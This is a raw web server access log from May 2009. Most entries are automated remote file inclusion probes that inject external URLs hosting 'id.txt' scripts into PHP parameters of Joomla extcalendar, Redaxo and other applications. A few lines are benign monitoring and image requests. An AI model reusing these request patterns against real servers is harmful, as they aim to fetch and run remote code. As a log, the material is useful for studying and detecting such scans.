66.175.122.228 - - [29/May/2009:04:50:06 -0400] "GET //?path%5Bdocroot%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:04:50:06 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.175.122.228 - - [29/May/2009:04:50:06 -0400] "GET /logs//?path%5Bdocroot%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0"
218.27.203.107 - - [29/May/2009:04:50:15 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://www.shoemasterkorea.com/board/data/id.txt?%0D? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
121.165.73.157 - - [29/May/2009:04:50:23 -0400] "GET /logs/access_log.Q109051700%20%20//?path%5Bdocroot%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:50:31 -0400] "GET /logs//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:50:31 -0400] "GET //include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:50:47 -0400] "GET /logs/access_log.Q109051000%20%20//include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://jamur.3dn.ru/id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:04:51:01 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:04:51:01 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:04:51:01 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://cafe9.fileave.com/ID1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:04:51:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
150.150.153.222 - - [29/May/2009:04:52:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IPMS/DE999696-14A1F9F6666; InfoPath.1)"
150.150.153.222 - - [29/May/2009:04:52:15 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; IPMS/DE999696-14A1F9F6666; InfoPath.1)"
